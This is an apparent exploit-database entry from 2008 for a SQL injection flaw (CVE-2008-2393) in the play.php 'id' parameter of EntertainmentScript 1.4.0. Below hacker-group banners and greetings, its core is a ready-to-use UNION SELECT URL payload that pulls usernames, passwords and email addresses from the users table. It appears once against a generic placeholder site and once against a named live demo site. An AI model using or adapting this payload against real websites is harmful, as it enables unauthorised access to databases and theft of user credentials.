EntertainmentScript 1.4.0 - 'play.php' SQL Injection

Author: Mr.SQL
type: webapps
platform: php
port: 
date_added: 2008-05-18 
date_updated: 2016-11-30 
verified: 1 
codes: OSVDB-45623;CVE-2008-2393;OSVDB-45459 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################
# rEm0te SQL Injection Vulnerability
#
# EntertainmentScript V1.4.0  (( play.php id ))
#
#########################################

## Script : EntertainmentScript.com   V1.4.0   name script on demo site is ( fastfreemedia )

## DeMo :  http://demo.fastfreemedia.com/index.php


#########################################

## AuTh0r : Mr.SQL

## H0ME  : WwW.PaL-HaCkEr.CoM

## Email  :  SQL@Hotmail.it

#########################################

## D0rK ::         :)) not found

###################################################################################

##  (()) -(:: SQL ::)- (())

www.Site.com/
              play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*

--------

##  :: liVe DeMO ::

http://demo.fastfreemedia.com/play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*


###########################################################################

  Gr33Tz   :: HaCkEr-EGy :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH ::     (( MuslimS HaCkErS ))

##########################################################################
                                                  -((:::: Geek Inj3cT0r ::::))-

# milw0rm.com [2008-05-19]